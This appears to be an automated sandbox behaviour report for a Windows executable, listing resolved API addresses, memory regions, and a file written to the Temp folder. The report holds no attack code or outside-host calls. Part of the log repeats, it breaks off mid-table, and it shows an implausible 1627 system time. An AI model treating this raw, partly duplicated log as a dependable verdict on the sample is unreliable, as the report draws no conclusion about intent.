| Load | VERSION.dll | base_address = 0x748e0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x752860c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75286110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x752787e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75285f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75284a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75285fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7527a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7527c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75286300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75279a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x752861b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7527fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77cf4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75279a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x752779b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7527fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x752792b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7527a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75286180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75283a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75278cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75285f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75272af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x752778f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75272db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75272da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75277a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7527a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75279660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7527a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7527a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x752787c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75278840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75277940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75279560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x752869c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75286390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x752a1c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x752868e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75286920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75286540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77ce5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77ce5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x752a26a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77cdda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77cff190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77cfa200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x752874f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75279fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75272d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x752775a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x752725e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75286870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x752868c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75286900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75279700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75271b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77d02570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75277920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77cf9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x752862a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75286590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75286860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75279680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x752864a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7527a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x752a28e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7527a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75286020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x752777b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7527fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75279a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75271ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75271da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75279930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7527a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75278770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7527fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75279fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75277910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75279a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75272dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75271d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75272b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7527a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7527a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77cdbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x752864f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x76a2ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x76a2fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x76a295e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x76a30680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x76a2ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x76a2f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x76a2ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x76a2ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x76a2f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x76a306c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x76a2efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x76a2f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x7516c6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x770aee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x770855a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x770857e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x77089590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x74cd1080 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x770afbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x771638f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x7717b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x7717b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x77167740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x771774e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x7717efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x77184ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x77174580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x77171540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x748e1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x748e1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x748e1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7527a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7527f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75277580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75279910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75286030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75285f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75285ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7527a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7527a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77cd40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77ccd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77ccecf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75285720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77cce140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77cceb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77d09990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77d05540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77cf9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7527a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x752a0a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74fa0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7527f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7527fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x752a1030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7527a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x752a14b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7527a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x752a16f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75279970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f23c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75278710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x752796e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-12 16:14:23 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #46: g13k6qzj.exe
175
0
| Information | Value |
|---|---|
| ID | #46 |
| File Name | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe |
| Command Line | G13k6QZj.exe -accepteula "To_Do_List.jtp" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:07, Reason: Child Process |
| Unmonitor | End Time: 00:02:12, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xdc8 |
| Parent PID | 0xa14 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
76C
0x
E98
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x00290fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| g13k6qzj.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000004e0000 | 0x004e0000 | 0x005dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006f0000 | 0x006f0000 | 0x006fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000700000 | 0x00700000 | 0x00887fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000890000 | 0x00890000 | 0x00a10fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a20000 | 0x00a20000 | 0x01e1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002000000 | 0x02000000 | 0x0200ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74680000 | 0x74711fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x75160000 | 0x7521dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75260000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x76a10000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x75160000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77000000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77150000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x748e0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x752860c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75286110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x752787e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75285f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75284a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75285fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7527a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7527c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75286300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75279a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x752861b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7527fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77cf4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75279a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x752779b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7527fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x752792b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7527a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75286180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75283a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75278cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75285f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75272af0 |
|
1 | |
